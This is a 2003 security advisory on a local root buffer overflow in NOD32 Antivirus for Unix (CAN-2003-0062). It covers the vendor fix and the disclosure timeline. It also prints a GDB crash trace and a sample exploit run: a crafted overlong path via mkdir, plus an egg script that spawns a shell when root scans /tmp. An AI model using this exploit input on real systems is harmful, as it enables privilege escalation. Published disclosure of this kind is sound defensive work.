iDEFENSE Security Advisory 02.10.03:
http://www.idefense.com/advisory/02.10.03.txt
Buffer Overflow In NOD32 Antivirus Software for Unix
February 10, 2003
I. BACKGROUND
Eset Software's NOD32 Antivirus System is a cross-platform anti-virus
application. The Linux, FreeBSD, OpenBSD and NetBSD versions are compiled
from the same sources, which the vendor refers to as "nod32 for UNIX".
More information is available at http://www.nod32.com/products/unix.htm .
II. DESCRIPTION
Local exploitation of a buffer overflow in NOD32 for UNIX could allow
attackers to gain super-user (root) privileges. The overflow occurs when
NOD32 parses a path with a name of length greater than 500 characters
(/tmp/AAAAA...AAA). An attacker can overwrite the first three bytes of
the eax and ecx registers, as can be seen from the following GDB output:
...
Program received signal SIGSEGV, Segmentation fault.
0x4207fa78 in strcmp () from /lib/i686/libc.so.6
(gdb) bt
#0 0x4207fa78 in strcmp () from /lib/i686/libc.so.6
#1 0x0804c2ba in scan_dir ()
#2 0x41414141 in ?? ()
Cannot access memory at address 0x41414141
(gdb) info registers
eax 0x4141414c 1094795596
ecx 0x4141414c 1094795596
...
III. ANALYSIS
Exploitation allows local code execution with the privileges of the user
who spawned NOD32. This is possible by creating an exploit path and then
socially engineering a target user into scanning over the exploit path
using NOD32. If the attacker has write permissions to a directory that is
routinely scanned with NOD32 (such as /tmp), he or she can gain the
privileges of the scanning user (usually root).
Proof of concept exploit code has been written for the FreeBSD 4.7
platform. The following is a sample exploit run that should set up shell
code in an environment variable and spawn a shell under the privileges of
the user executing NOD32:
$ perl eggnod.pl
$ mkdir -p /tmp/`perl -e 'print "A" x 255'`/`perl -e 'print "B" x 240 . "\xfc\xbf\xbf"'`
$ nod32 /tmp
IV. DETECTION
NOD32 Antivirus System for Unix version 1.012 and below is vulnerable.
V. VENDOR FIX
The latest version 1.013 fixes the issue and can be downloaded from
http://www.nod32.com
VI. CVE INFORMATION
The Mitre Corp.'s Common Vulnerabilities and Exposures (CVE) Project
assigned the identification number CAN-2003-0062 to this issue.
VII. DISCLOSURE TIMELINE
12/03/2003 Issue disclosed to iDEFENSE
01/28/2003 Eset Software notified ([email protected])
01/28/2003 iDEFENSE clients notified
02/03/2003 Response received from Palo Luka ([email protected])
02/10/2003 Coordinated Public Disclosure
VIII. CREDIT
Knud Erik Højgaard ([email protected]) discovered this vulnerability.
Get paid for security research
http://www.idefense.com/contributor.html
Subscribe to iDEFENSE Advisories:
send email to [email protected], subject line: "subscribe"
About iDEFENSE:
iDEFENSE is a global security intelligence company that proactively
monitors sources throughout the world, from technical
vulnerabilities and hacker profiling to the global spread of viruses
and other malicious code. Our security intelligence services provide
decision-makers, frontline security professionals and network
administrators with timely access to actionable intelligence
and decision support on cyber-related threats. For more information,
visit http://www.idefense.com .